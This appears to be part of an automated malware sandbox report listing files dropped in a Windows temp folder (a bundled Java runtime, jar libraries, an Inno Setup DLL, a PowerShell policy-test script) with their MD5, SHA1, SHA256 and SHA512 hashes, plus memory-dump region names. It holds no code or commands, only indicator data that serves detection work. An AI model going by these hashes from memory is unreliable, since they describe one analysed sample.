MD5 4bc2aea7281e27bc91566377d0ed1897
SHA1 d02d897e8a8aca58e3635c009a16d595a5649d44
SHA256 4aef566bbf3f0b56769a0c45275ebbf7894e9ddb54430c9db2874124b7cea288
SHA512 da35bb2f67bca7527dc94e5a99a162180b2701ddca2c688d9e0be69876aca7c48f192d0f03d431ccd2d8eec55e0e681322b4f15eba4db29ef5557316e8e51e10

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-systemtray-ext.jar

MD5 acc229916e4c7c666b45072b525041e7
SHA1 36f508f20347fce608130806a26cd796daf5dd20
SHA256 91ed39e83199784b0fb359a9e2b319572b2ba1b1f4492e82a590bf488650f7f4
SHA512 c537c442874c63103f5ae934b6fdd03834e62b7374070efcbcd05b606d02274679078c38437cb1de79e3284f39fc2981c79274d93b0ba4afeb7c6942cca54235

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\mail.jar

MD5 ec6e4e5ebd85a221b395b8f3b37545e6
SHA1 85319c87280f30e1afc54c355f91f44741beac49
SHA256 17bddec86cfe01092bd358c249b7c2ce4295c13cdad314d8eacc8426fdbe3034
SHA512 3e3e406542676f27b5008a061ceaa90580e2f9fd78b31576c99f7612033f2dd0a14824e7bfb16e6f1a12ad96985319fd6f1c2706230019c76ce22da8c7dfd181

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\currency.data

MD5 f6258230b51220609a60aa6ba70d68f3
SHA1 b5b95dd1ddcd3a433db14976e3b7f92664043536
SHA256 22458853da2415f7775652a7f57bb6665f83a9ae9fb8bd3cf05e29aac24c8441
SHA512 b2dfcfdebf9596f2bb05f021a24335f1eb2a094dca02b2d7dd1b7c871d5eecda7d50da7943b9f85edb5e92d9be6b6adfd24673ce816df3960e4d68c7f894563f

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\slf4j-api.jar

MD5 caafe376afb7086dcbee79f780394ca3
SHA1 da76ca59f6a57ee3102f8f9bd9cee742973efa8a
SHA256 18c4a0095d5c1da6b817592e767bb23d29dd2f560ad74df75ff3961dbde25b79
SHA512 5dd6271fd5b34579d8e66271bab75c89baca8b2ebeaa9966de391284bd08f2d720083c6e0e1edda106ecf8a04e9a32116de6873f0f88c19c049c0fe27e5d820b

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\zt-zip.jar

MD5 0fd8bc4f0f2e37feb1efc474d037af55
SHA1 add8fface4c1936787eb4bffe4ea944a13467d53
SHA256 1e31ef3145d1e30b31107b7afc4a61011ebca99550dce65f945c2ea4ccac714b
SHA512 29de5832db5b43fdc99bb7ea32a7359441d6cf5c05561dd0a6960b33078471e4740ee08ffbd97a5ced4b7dd9cc98fad6add43edb4418bf719f90f83c58188149

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\slf4j-simple.jar

MD5 722bb90689aecc523e3fe317e1f0984b
SHA1 8dacf9514f0c707cbbcdd6fd699e8940d42fb54e
SHA256 0966e86fffa5be52d3d9e7b89dd674d98a03eed0a454fbaf7c1bd9493bd9d874
SHA512 d5effbfa105bcd615e56ef983075c9ef0f52bcfdbefa3ce8cea9550f25b859e48b32f2ec9aa7a305c6611a3be5e0cde0d269588d9c2897ca987359b77213331d

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\security\java.security

MD5 409c132fe4ea4abe9e5eb5a48a385b61
SHA1 446d68298be43eb657934552d656fa9ae240f2a2
SHA256 4d9e5a12b8cac8b36ecd88468b1c4018bc83c97eb467141901f90358d146a583
SHA512 7fed286ac9aed03e2dae24c3864edbbf812b65965c7173cc56ce622179eb5f872f77116275e96e1d52d1c58d3cdebe4e82b540b968e95d5da656aa74ad17400d

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\jsse.jar

MD5 fd1434c81219c385f30b07e33cef9f30
SHA1 0b5ee897864c8605ef69f66dfe1e15729cfcbc59
SHA256 bc3a736e08e68ace28c68b0621dccfb76c1063bd28d7bd8fce7b20e7b7526cc5
SHA512 9a778a3843744f1fabad960aa22880d37c30b1cab29e123170d853c9469dc54a81e81a9070e1de1bf63ba527c332bb2b1f1d872907f3bdce33a6898a02fef22d

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\net.dll

MD5 691b937a898271ee2cffab20518b310b
SHA1 abedfcd32c3022326bc593ab392dea433fcf667c
SHA256 2f5f1199d277850a009458edb5202688c26dd993f68fe86ca1b946dc74a36d61
SHA512 1c09f4e35a75b336170f64b5c7254a51461dc1997b5862b62208063c6cf84a7cb2d66a67e947cbbf27e1cf34ccd68ba4e91c71c236104070ef3beb85570213ec

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\nio.dll

MD5 95edb3cb2e2333c146a4dd489ce67cbd
SHA1 79013586a6e65e2e1f80e5caf9e2aa15b7363f9a
SHA256 96cf590bddfd90086476e012d9f48a9a696efc054852ef626b43d6d62e72af31
SHA512 ab671f1bce915d748ee49518cc2a666a2715b329cab4ab8f6b9a975c99c146bb095f7a4284cd2aaf4a5b4fcf4f939f54853af3b3acc4205f89ed2ba8a33bb553

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\tzdb.dat

MD5 5a7f416bd764e4a0c2deb976b1d04b7b
SHA1 e12754541a58d7687deda517cdda14b897ff4400
SHA256 a636afa5edba8aa0944836793537d9c5b5ca0091ccc3741fc0823edae8697c9d
SHA512 3ab2ad86832b98f8e5e1ce1c1b3ffefa3c3d00b592eb1858e4a10fff88d1a74da81ad24c7ec82615c398192f976a1c15358fce9451aa0af9e65fb566731d6d8f

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\tzmappings

MD5 b8dd8953b143685b5e91abeb13ff24f0
SHA1 b5ceb39061fce39bb9d7a0176049a6e2600c419c
SHA256 3d49b3f2761c70f15057da48abe35a59b43d91fa4922be137c0022851b1ca272
SHA512 c9cd0eb1ba203c170f8196cbab1aaa067bcc86f2e52d0baf979aad370edf9f773e19f430777a5a1c66efe1ec3046f9bc82165acce3e3d1b8ae5879bd92f09c90

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\resources.jar

MD5 9a084b91667e7437574236cd27b7c688
SHA1 d8926cc4aa12d6fe9abe64c8c3cb8bc0f594c5b1
SHA256 a1366a75454fc0f1ca5a14ea03b4927bb8584d6d5b402dfa453122ae16dbf22d
SHA512 d603aa29e1f6eefff4b15c7ebc8a0fa18e090d2e1147d56fd80581c7404ee1cb9d6972fcf2bd0cb24926b3af4dfc5be9bce1fe018681f22a38adaa278bf22d73

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\msvcr120.dll

MD5 034ccadc1c073e4216e9466b720f9849
SHA1 f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1
SHA256 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f
SHA512 5f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\msvcp120.dll

MD5 fd5cabbe52272bd76007b68186ebaf00
SHA1 efd1e306c1092c17f6944cc6bf9a1bfad4d14613
SHA256 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608
SHA512 1563c8257d85274267089cd4aeac0884a2a300ff17f84bdb64d567300543aa9cd57101d8408d0077b01a600ddf2e804f7890902c2590af103d2c53ff03d9e4a5

memory/3432-402-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3432-406-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3432-411-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3432-423-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3120-430-0x0000000002CD0000-0x0000000002D06000-memory.dmp

memory/3120-431-0x00000000057F0000-0x0000000005E18000-memory.dmp

memory/4844-432-0x0000000005440000-0x0000000005462000-memory.dmp

memory/4844-434-0x0000000005D90000-0x0000000005DF6000-memory.dmp

memory/4844-433-0x0000000005D20000-0x0000000005D86000-memory.dmp

memory/3120-435-0x0000000005FA0000-0x00000000062F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bv3m2jsu.0tf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3120-454-0x00000000065D0000-0x00000000065EE000-memory.dmp

memory/3120-455-0x0000000006600000-0x000000000664C000-memory.dmp

memory/4844-457-0x0000000007570000-0x0000000007606000-memory.dmp

memory/4844-458-0x0000000006970000-0x000000000698A000-memory.dmp

memory/3120-459-0x0000000006B30000-0x0000000006B52000-memory.dmp

memory/4844-460-0x0000000007BC0000-0x0000000008164000-memory.dmp

memory/1908-485-0x000000006DB80000-0x000000006DBCC000-memory.dmp

memory/4448-484-0x000000006DB80000-0x000000006DBCC000-memory.dmp

memory/4448-483-0x0000000007270000-0x00000000072A2000-memory.dmp

memory/4448-504-0x0000000006690000-0x00000000066AE000-memory.dmp

memory/1908-505-0x0000000007580000-0x0000000007623000-memory.dmp

memory/4448-506-0x0000000007A10000-0x000000000808A000-memory.dmp

memory/4448-507-0x0000000007450000-0x000000000745A000-memory.dmp

memory/1908-508-0x0000000007AE0000-0x0000000007AF1000-memory.dmp

memory/1908-509-0x0000000007B20000-0x0000000007B2E000-memory.dmp

memory/4448-510-0x0000000007630000-0x0000000007644000-memory.dmp

memory/4448-511-0x0000000007720000-0x000000000773A000-memory.dmp

memory/4448-512-0x0000000007700000-0x0000000007708000-memory.dmp

memory/2292-516-0x0000000000400000-0x0000000000588000-memory.dmp

memory/2292-525-0x0000000000400000-0x0000000000588000-memory.dmp

memory/3736-526-0x0000000000400000-0x000000000043C000-memory.dmp

memory/3432-541-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3432-547-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3432-556-0x0000000002540000-0x0000000002541000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-4UM4U.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/4520-744-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/4520-745-0x0000000004E90000-0x0000000004F22000-memory.dmp

memory/4520-746-0x0000000005100000-0x00000000052C2000-memory.dmp

memory/4520-748-0x0000000005030000-0x0000000005080000-memory.dmp

memory/4520-747-0x0000000004FB0000-0x0000000005026000-memory.dmp

memory/4520-749-0x0000000004DC0000-0x0000000004DCA000-memory.dmp

memory/4520-750-0x00000000060C0000-0x00000000065EC000-memory.dmp

memory/4520-751-0x00000000054B0000-0x00000000054CE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpCE64.tmp

MD5 a603e09d617fea7517059b4924b1df93
SHA1 31d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256 ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512 eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

C:\Users\Admin\AppData\Local\Temp\tmpCE77.tmp

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

memory/4520-775-0x0000000007A40000-0x0000000007A4A000-memory.dmp